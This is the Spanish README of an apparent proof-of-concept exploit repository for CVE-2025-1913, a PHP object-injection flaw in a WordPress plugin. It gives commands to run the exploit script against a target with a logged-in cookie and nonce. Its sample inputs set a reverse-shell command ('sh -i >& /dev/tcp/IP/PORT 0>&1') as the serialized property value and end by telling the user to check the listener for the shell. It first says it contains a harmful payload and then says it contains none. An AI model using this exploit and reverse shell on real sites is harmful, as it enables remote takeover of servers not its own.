
Un PoC que demuestra CVE-2025-1913, mostrando cómo el manejo inseguro de unserialize del plugin puede conducir a impactos de alto riesgo en entornos controlados. Contiene una carga útil dañina solo para pruebas autorizadas. Úselo estrictamente en laboratorios aislados y para investigación defensiva.
Este repositorio contiene una Prueba de Concepto (PoC) solo con fines educativos para CVE-2025-1913, creada por Suhaib518 🇸🇦. Esta PoC demuestra cómo una entrada de PHP serializada especialmente diseñada puede desencadenar lógica vulnerable en componentes de WordPress afectados. La PoC es segura y no incluye cargas útiles dañinas.
⚠️ Aviso legal: Esta PoC es solo para aprendizaje, investigación y pruebas de seguridad defensivas. NO lo use en servidores que no posea o para los que no tenga permiso explícito para realizar pruebas.
La vulnerabilidad existe debido al manejo inseguro de datos serializados de PHP en ciertos flujos de trabajo de plugins de WordPress. Esta PoC muestra cómo un atacante podría proporcionar estructuras serializadas manipuladas que causen un comportamiento interno no deseado.
Este repositorio incluye un script de Python que:
.
├── CVE-2025-1913-PoC.py # El script PoC creado por Suhaib518 KSA
└── README.md # Documentación
El script solo utiliza módulos integrados de Python excepto requests:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
Se le preguntará:
Luego, el script las serializará, construirá una solicitud de WordPress y la enviará.
A continuación se muestra un comando de ejemplo que demuestra el uso con valores de ejemplo (estos no son maliciosos, solo muestran el proceso):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
Respuestas de ejemplo a las preguntas interactivas:
[?] ¿Cuántas propiedades tiene esta clase? 2
[?] Nombre de la propiedad #1: file
[?] Valor para 'file': shell.sh
[?] Nombre de la propiedad #2: shell
[?] Valor para 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
Luego, el script imprimirá:
[*] Enviando solicitud…
....Verifique el listener para la shell.
unserialize() en entradas no confiablesLicencia MIT.
Creado por Suhaib518 🇸🇦.